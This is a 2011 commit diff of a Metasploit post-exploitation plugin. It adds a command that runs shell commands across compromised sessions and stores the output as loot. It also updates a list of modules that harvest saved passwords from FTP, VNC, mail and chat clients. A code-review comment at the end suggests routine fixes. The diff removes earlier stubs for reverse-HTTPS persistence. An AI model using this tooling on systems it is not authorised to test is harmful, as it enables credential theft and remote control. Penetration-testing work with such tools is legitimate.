
updated with new command

1 parent 1233f4f commit 8be3edb038d146590623f881e632c49c178f8c12 @darkoperator committed Sep 29, 2011
Showing with 65 additions and 78 deletions.
  1. +65 −78 post_auto.rb
143 post_auto.rb
@@ -19,8 +19,6 @@
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-# NOTE: Change later name of module and break commands by type.
module Msf
class Plugin::Postauto < Msf::Plugin
class PostautoCommandDispatcher
@@ -36,81 +34,73 @@ def commands
'multi_post_rc' => "Run resource file with post modules and options against specified sessions.",
'multi_meter_cmd' => "Run a Meterpreter Console Command against specified sessions.",
'multi_meter_cmd_rc' => "Run resource file with Meterpreter Console Commands against specified sessions.",
+ "multi_cmd" => "Run shell command against several sessions",
"sys_creds" => "Run system password collection modules against specified sessions.",
- "app_creds" => "Run application password collection modules against specified sessions.",
- #"import_medusa" => "Import output file generated by Medussa Bruteforce tool.",
- #"persist_mem" => "Add Meterpreter Reverse HTTPS memory persistan payload to specified sessions.",
- #"persist_file" => "Add Meterpreter Reverse HTTPS boot persistant payload to specified sessions."
+ "app_creds" => "Run application password collection modules against specified sessions."
}
end
-
- def cmd_persist_mem(*args)
+ # Multi shell command
+ def cmd_multi_cmd(*args)
+ # Define options
opts = Rex::Parser::Arguments.new(
- "-s" => [ true, "Sessions to run modules against. Example <all> or <1,2,3,4>"],
- "-l" => [ true, "Comma separated list of IP's to receive connection."],
- "-p" => [ true, "Port for reverse connection. Default 8443."],
- "-hd" => [ false, "Start handler for connection."],
+ "-s" => [ true, "Comma separated list of essions to run modules against."],
+ "-c" => [ true, "Shell command to run."],
+ "-p" => [ true, "Platform to run the command against. If none given it will run against all."],
"-h" => [ false, "Command Help"]
)
- meter_payload = "windows/meterpreter/reverse_https"
- rport = 8443
- start_handler = false
- ip_list = nil
- sessions = nil
- end
-
- # browser_creds Command
- # Note need to finish
- #-------------------------------------------------------------------------------------------
- def cmd_import_medusa(*args)
- opts = Rex::Parser::Arguments.new(
- "-f" => [ true, "Medusa output file to import."],
- "-h" => [ false, "Command Help"]
- )
- out_file = nil
- entries = ""
+ # set variables for options
+ sessions = []
+ command = ""
+ plat = ""
+ # Parse options
opts.parse(args) do |opt, idx, val|
case opt
- when "-f"
- out_file = val
- if not ::File.exists?(script)
- print_error "Resource File does not exists!"
- return
- else
- ::File.open(out_file, "r").each_line do |line|
- # Empty line
- next if line.strip.length < 1
- # Comment
- next if line[0,1] == "#"
- entries << line.chomp
+ when "-s"
+ if val =~ /all/i
+ sessions = framework.sessions.keys
+ else
+ sessions = val.split(",")
end
- end
- when "-h"
- print_line opts.usage
- return
+
+ when "-c"
+ command = val
+ when "-p"
+ plat = val
+ when "-h"
+ print_line(opts.usage)
+ return
end
end
- entries.each_line do |l|
- if l =~ /SUCCESS/
- service,host,user,pass = l.scan(/\[(\w*)\]\sHost\:\s(\S*)\sUser\:\s(\S*)\sPassword\:\s(\S*)\s\[SUCCESS\]/)[0]
- case service
- when /ssh/
- port = 22
- srv = service
- when /smbnt/
- port = 445
- srv = 'smb'
+
+ # Make sure that proper values where provided
+ if not sessions.empty? and not command.empty?
+ # Iterate thru the session IDs
+ sessions.each do |s|
+ # Set the session object
+ session = framework.sessions[s.to_i]
+ if session.platform =~ /#{plat}/i || plat.empty?
+ host = session.tunnel_peer.split(":")[0]
+ print_status("Running #{command} against session #{s}")
+ # Run the command
+ cmd_out = session.shell_command_token(command)
+ # Print good each line of the command output
+ cmd_out.each_line do |l|
+ print_good(l.chomp)
+ end
+ file_name = "#{File.join(Msf::Config.loot_directory,"#{Time.now.strftime("%Y%m%d%H%M%S")}_command.txt")}"
+ framework.db.report_loot({ :host=> host,
+ :path=> file_name,
+ :ctype=> "text/plain",
+ :ltype=> "host.command.shell",
+ :data=> cmd_out,
+ :name=>"#{host}.txt",
+ :info=> "Output of command #{command}" })
end
- auth =
- {
- :host => host, :port => port, :sname => srv,
- :user => user, :pass => pass,
- :type => 'password', :active => true
- }
- framework.db.report_auth_info(auth)
end
+ else
+ print_error("You must specify both a session and a command!")
end
end
@@ -124,21 +114,18 @@ def cmd_app_creds(*args)
)
cred_mods = [
- {"mod" => "windows/gather/credentials/nimbuzz", "opt" => nil},
- {"mod" => "windows/gather/credentials/trillian", "opt" => nil},
- {"mod" => "windows/gather/credentials/smartftp", "opt" => nil},
- {"mod" => "windows/gather/credentials/filezilla_server", "opt" => nil},
- {"mod" => "windows/gather/credentials/wsftp_client", "opt" => nil},
- {"mod" => "windows/gather/credentials/coreftp", "opt" => nil},
- {"mod" => "windows/gather/credentials/winscp", "opt" => nil},
- {"mod" => "windows/gather/credentials/vnc", "opt" => nil},
- {"mod" => "windows/gather/credentials/mremote", "opt" => nil},
- {"mod" => "windows/gather/credentials/total_commander", "opt" => nil},
- {"mod" => "windows/gather/credentials/idm", "opt" => nil},
- {"mod" => "windows/gather/credentials/flashfxp", "opt" => nil},
- {"mod" => "windows/gather/credentials/imail", "opt" => nil},
- {"mod" => "windows/gather/credentials/outlook", "opt" => nil},
- {"mod" => "windows/gather/credentials/enum_meebo_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_coreftp_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_flashfxp_pwd", "opt" => nil},
+ {"mod" => "windows/gather/enum_idm_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_imail_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_mremote_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_nimbuzz_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_outlook_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_smartftp_pwd", "opt" => nil},
+ {"mod" => "windows/gather/enum_trillian_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_vnc_pw", "opt" => nil},
+ {"mod" => "windows/gather/enum_winscp_pwds", "opt" => nil},
+ {"mod" => "windows/gather/wsftp_client_creds", "opt" => nil},
{"mod" => "multi/gather/pidgin_cred", "opt" => nil},
{"mod" => "multi/gather/filezilla_client_cred", "opt" => nil},
{"mod" => "multi/gather/ssh_creds", "opt" => nil},
@@ -512,4 +499,4 @@ def desc
"Plugin for Post-Exploitation automation."
end
end
-end
+end
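Review bot: In `cmd_multi_cmd`, `framework.sessions[s.to_i]` is used without a nil check, so an id that does not exist (or non-numeric input, where `to_i` yields 0) makes the following `session.platform` raise and abandons the remaining sessions; print an error and `next unless session` right after the lookup. The platform filter interpolates the `-p` value as a raw pattern in `/#{plat}/i`, so a stray metacharacter raises `RegexpError`, and the `|| plat.empty?` branch is redundant because an empty pattern already matches; `plat.empty? || session.platform =~ /#{Regexp.escape(plat)}/i` is safer. The `report_loot` call records a `:path` under the loot directory, but nothing visible in this hunk writes that file, and the second-resolution timestamp gives the same name to every session handled within one second, so the stored record may point at a missing or ambiguous file; confirm how `report_loot` treats `:data` and whether `framework.db` is active before calling it. The `-s` help string also reads "essions", and `val =~ /all/i` accepts any value that merely contains "all"; an anchored `/\Aall\z/i` would match the documented usage.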
